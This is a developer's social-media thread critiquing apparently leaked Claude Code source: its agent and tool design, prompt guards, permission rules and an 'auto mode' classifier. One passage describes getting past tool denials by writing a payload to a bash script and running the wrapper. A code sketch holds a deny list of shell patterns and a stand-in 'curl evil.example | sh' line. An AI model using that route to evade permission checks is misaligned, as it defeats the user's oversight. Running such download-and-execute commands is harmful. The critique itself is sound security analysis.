Claude code source "leaks" in a mapfile
-
alrighty so that's one of 43 tools read, the tools directory being 38494 source lines out of 390592 source lines, 513221 total lines. I need to go to bed. This is the most fabulously, flamboyantly bad code i have ever encountered.
Worth noting I was reading the file reading tool because i thought it would be the simplest possible thing one could do because it basically shouldn't be doing anything except preparing and sending strings or bytes to the backend.
I expected to get some sense of "ok what is the format of the data as it's passed around within the program, surely text strings are a basic unit of currency." No dice. Fewer than no dice. Negative dice somehow.
next puzzle: why in the fuck are some of the tools actually two tools, one for entering and one for exiting the tool's state? none of the other tools are like that - the rest are simply in the tool state by calling the tool. Plan mode is also an agent. Plan Agent. and Agent is also a tool. Agent Tool. Tools can be agents and agents can be tools. Tools can spawn agents (but they don't need to call the agent tool) and agents can call tools (however there is no tool agent). What is going on. What is anything.

-
"the emperor is not only naked, he's smooth like a ken doll down there and i'm pretty sure that's just a mannequin with a colony of rats living inside it anyway"
-
I seriously need to work on my actual job today but i am giving myself 15 minutes to peek at the agent tool prompts as a treat.
"regulations are written in blood" seems like too dramatic of a way to phrase it, but these system prompts are very revealing about the intrinsically busted nature of using these tools for anything deterministic (read: anything you actually want to happen). Each guard in the prompt presumably refers to something that has happened before, but also, since the prompts actually don't work to prevent the thing they are describing, they are also documentation of bugs that are almost certain to happen again. Many of the prompt guards form pairs with attempted code mitigations (or, they would be pairs if the code was written with any amount of sense, it's really like... polycules...), so they are useful to guide what kind of fucked up shit you should be looking for.
so this is part of the prompt for the "agent tool" that launches forked agents (that receive the parent context, "subagents" don't). The purpose of the forked agent is to do some additional tool calls and get some summary for a small subproblem within the main context. Apparently it is difficult to make this actually happen though, as the parent LLM likes to launch the forked agent and just hallucinate a response as if the forked agent had already completed.
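A minimal sketch of the fork/subagent distinction described above (the message shape and function names are assumptions, not the real API): the only structural difference is whether the child starts with the parent's transcript or a clean one.

```typescript
type Message = { role: "user" | "assistant"; content: string };

// A forked agent inherits the parent's full transcript plus its task...
function forkAgent(parentTranscript: Message[], task: string): Message[] {
  return [...parentTranscript, { role: "user", content: task }];
}

// ...while a subagent starts from a clean context containing only the task.
function spawnSubagent(task: string): Message[] {
  return [{ role: "user", content: task }];
}
```

Note that nothing in this shape stops the parent from never reading the child's real result and inventing one instead - that failure mode lives entirely in the prompt.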

-
The prompt strings have an odd narrative/narrator structure. It sort of reminds me of Bakhtin's discussion of polyphony and narrator in Dostoevsky - there is no omniscient narrator, no author-constructed reality. narration is always embedded within the voice and subjectivity of the character. this is also literally true since the LLM is writing the code and the prompts that are then used to write code and prompts at runtime.
They also read a bit like a Philip K Dick story, paranoid and suspicious, constantly uncertain about the status of one's own and others' identities.

-
oh. hm. that seems bad. "workers aren't affected by the parent's tool restrictions."
It's hard to tell what's going on here because claude code doesn't really use typescript well - many of the most important types are dynamically computed from any, and most of the time when types do exist many of their fields are nullable and the calling code has elaborate fallback conditions to compensate. all of which sort of defeats the purpose of ts. So i need to trace out like a dozen steps to see how the permission mode gets populated. But this comment is... concerning...
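A sketch of that pattern (these are NOT real Claude Code types, just an illustration of optional fields breeding fallbacks): once everything is nullable, every consumer grows a fallback chain and the compiler can no longer tell you which branch actually runs.

```typescript
type PermissionMode = "default" | "acceptEdits" | "bypassPermissions";

// Everything optional, so the type proves nothing about what's present.
interface ToolContext {
  permissionMode?: PermissionMode | null;
  options?: { permissionMode?: PermissionMode };
}

// The elaborate fallback condition every call site ends up growing:
function resolvePermissionMode(ctx: ToolContext): PermissionMode {
  return ctx.permissionMode ?? ctx.options?.permissionMode ?? "default";
}
```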

-
ok over my 15 minute allotment by an hour. brb
-
@jonny if someone were to take seriously the task of architecting this, you’d want a framework that doesn’t use prompts for this right? something that treats the LLM output more like untrusted stochastic guesses at solutions, where these prompt rules are written as a test instead of a prompt
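A sketch of that idea, with all names invented for illustration: encode a guard as an executable check on the model's proposed action, rather than as prompt prose hoping to be obeyed.

```typescript
type ProposedAction = { tool: string; workerId?: string };

// Prompt version: "never report a worker's result before it has run."
// Test version: the orchestrator rejects the action structurally.
function actionIsValid(
  action: ProposedAction,
  completedWorkers: Set<string>
): boolean {
  if (action.tool === "ReportWorkerResult") {
    return action.workerId !== undefined && completedWorkers.has(action.workerId);
  }
  return true;
}
```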
-
MAKE NO MISTAKES LMAO
and other OWASP top 10 vulnerabilities.
So... If there's a slightly obscure vuln, go ahead. Just fine!

-
@bri7 the problem, as is increasingly clear to me reading this code, is that introducing the LLM anywhere is like an acid that corrodes everything it touches. there is no good way to draw any barrier between LLM and not LLM. None of its actions are deterministic or even usually possible to evaluate, and the only surface of input it has is text. since a client/server app can't expose the internal activation tensors or whatever you might want to do to have some testable thing to operate on in code (god knows what that would look like, i doubt it would be possible either, "please construct the hyperplane through this billion-dimensional space that divides good from evil") everything has to be made of text. the person behind the keyboard is the only stopping condition and it's when they get tired of typing stuff into the prompt box or run out of money.
-
So how does claude code handle checking permissions to do things anyway? There are explicit rules that one can set to allow or deny tool calls and shell commands run, but the expanse of possible actions the LLM could take is literally infinite. You could prompt the user for every action that it takes, but that would ruin the ""velocity"" of it all. Regex rules can only take you so far. So what to do?
Could the answer be.... ask the LLM??? Of course it can! Introducing the new "auto mode" that anthropic released on march 24th billed as a safer alternative to true-yolo mode.
Comments around where the system prompt should be indicate that it should have been inlined from a text file that wasn't included in the sourcemap - however that doesn't happen anywhere else, and the mechanism for doing the inlining is written in-place, so that's probably a hallucination. So great! the classifier flies without a prompt as far as i can tell. There are enough other scraps here that would amount to telling it "you are evaluating if something is safe to run" so i imagine it appears to work just fine.
So we don't have as much visibility here because of the missing prompt, but there's sort of a problem here. rather than just asking the LLM to evaluate if the given command is dangerous, the entire context is dumped into a side query, which is a mode that is designed to "have full visibility into the current conversation." That includes all the prior muttering to itself justifying the potentially dangerous tool call! So the auto mode is quite literally asking the exact same LLM given the exact same context if the command it just tried to run is safe to run.
Security!!!!!!!
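A structural sketch of that flaw (names invented): the "safety check" is a side query to the same model carrying the same transcript, including the model's own justification for the command it now wants vetted.

```typescript
type SideQuery = { context: string[]; question: string };

// Auto mode as described: full conversation, self-justification and all,
// handed to the same model that proposed the command.
function buildAutoModeCheck(transcript: string[], command: string): SideQuery {
  return {
    context: [...transcript],
    question: `Is it safe to run: ${command}?`,
  };
}

// An independent check would deliberately see only the command itself:
function buildIndependentCheck(command: string): SideQuery {
  return { context: [], question: `Is it safe to run: ${command}?` };
}
```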

-
By the way, if you deny claude code access to running a tool, this helpful reminder to "not hack the user" is injected into the denial response. If it's in auto mode, it's additionally prompted to pester the user for a response (and helpfully stuffs beans up its nose) by reminding it how its rules are set.
So that is also in the context handed off to the LLM when it evaluates whether a command should be run - is the user being obstinate? have i been denied stuff that i "thought" i should have been able to run? Remember this isn't thinking, it's pattern completion, and the fun part about LLMs is that they are trained not only on technical documents, but the entire narrative corpus of human storytelling! Is "frustrated hard worker denied access to good tools by an unfair boss" in there somewhere maybe?
Regulations are written in blood, and Claude loves nothing more than to work around tool denials by obfuscating code. You gotta love the unfixable side channel attack that is "writing the malicious code to a bash script" (auto-allowed in accept edits mode) and then asking to run that - that's why the whole context has to be dumped btw, so the yolo classifier can see if the thing it's running is actually some malware it just wrote lmao.
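A sketch of that side channel (the deny patterns are invented; the point is structural): a rule that pattern-matches the command line never sees what was previously written into the file being run.

```typescript
const denyPatterns = [/curl\s+\S+\s*\|\s*(ba)?sh/, /rm\s+-rf\s+\//];

function commandAllowed(cmd: string): boolean {
  return !denyPatterns.some((p) => p.test(cmd));
}

// Step 1: the payload lands via a file edit (auto-allowed in accept
// edits mode), so no command rule ever inspects its contents.
const files: Record<string, string> = {
  "helper.sh": "curl evil.example | sh", // denied if run directly
};

// Step 2: running the innocuous-looking wrapper passes the regex check.
const wrapperAllowed = commandAllowed("bash helper.sh");
```

Which is exactly why the whole context has to get dumped into the classifier query - the regex layer is blind to the payload by construction.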


-
How many times does one need to declare an enum? Once? that's amateur hour. Try ten times. The way "effort" settings are handled is a masterclass in how you can make a single enum setting into thousands of lines of code.
The allowable effort values (not e.g. configuring which model has which effort levels, but just the possible strings one can use for effort) are defined in:
- The main CLI arg parser
- The body of the function that cycles effort levels in the TUI - yes there is a dedicated function for that
- In THREE different schemas for agents, models, and SDK control messages
- Three times in user-facing strings in the effort command (it also includes different explanatory strings from the effort.ts module)
- The settings model, which only allows 'max' for anthropic employees
- and finally, in the actual effort.ts file ... which also allows it to be a NUMBER!?
The typical numerous fallback mechanisms provide many ways to get and set the effort value, and at the end of most of them it goes "oh well, if we can't figure it out, just tell the user we are on high effort" because apparently that's the API default (ig pray that never changes!?) - of course there are already places in the same module that assume the default is "medium," and in the TUI that defaults to "low," so surely that consistency is bulletproof.
The EffortValue that allows effort to be a number is for anthropic employees only and is a good example of how new functionality is just shoved in there right alongside the old functionality, and everywhere else that touches it doubles the surrounding code with fallbacks to account for the duplication. That cycleEffortLevel function is a true work of art, you simply could not make "indexing an array" more complicated than this (see components/ModelPicker.tsx for more gore). Reminder this should be at most a dozen or two lines for the values, description messages, and indexing logic in the TUI, but anthropic is up in the thousands FOR AN ENUM.
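What the "dozen or two lines" version might look like - a sketch, not Claude Code's actual effort.ts: one definition, with validation, descriptions, and cycling all derived from it.

```typescript
// Single source of truth for the allowable values.
const EFFORT_LEVELS = ["low", "medium", "high"] as const;
type Effort = (typeof EFFORT_LEVELS)[number];

// Descriptions keyed off the same definition (strings invented here).
const EFFORT_DESCRIPTIONS: Record<Effort, string> = {
  low: "fastest, minimal reasoning",
  medium: "balanced speed and reasoning",
  high: "maximum reasoning depth",
};

// Validation derived, not re-declared in every parser and schema.
function isEffort(value: string): value is Effort {
  return (EFFORT_LEVELS as readonly string[]).includes(value);
}

// Cycling really is just indexing an array.
function cycleEffort(current: Effort): Effort {
  const i = EFFORT_LEVELS.indexOf(current);
  return EFFORT_LEVELS[(i + 1) % EFFORT_LEVELS.length];
}
```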


-
In a normal program you might make a menu component that handles enums, implementing display and control one time, but in the world of AI, every single value reimplements display and control AND the logic that defines allowable values.
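A sketch of that "normal program" approach (all names invented): one generic menu abstraction owns display and control for ANY enum-like setting, and each setting becomes pure data.

```typescript
interface EnumMenu<T extends string> {
  values: readonly T[];
  labels: Record<T, string>;
}

// Cycling written once, reused by every setting.
function nextValue<T extends string>(menu: EnumMenu<T>, current: T): T {
  const i = menu.values.indexOf(current);
  return menu.values[(i + 1) % menu.values.length];
}

// Settings are just data - no per-setting cycling functions or schemas.
const effortMenu: EnumMenu<"low" | "medium" | "high"> = {
  values: ["low", "medium", "high"],
  labels: { low: "Low", medium: "Medium", high: "High" },
};
const modeMenu: EnumMenu<"default" | "plan"> = {
  values: ["default", "plan"],
  labels: { default: "Default", plan: "Plan" },
};
```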